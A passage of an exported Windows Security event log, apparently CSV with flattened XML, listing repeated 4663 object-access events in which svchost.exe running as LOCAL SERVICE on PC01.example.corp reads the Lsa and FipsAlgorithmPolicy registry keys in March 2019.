\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + 
S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + 
S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
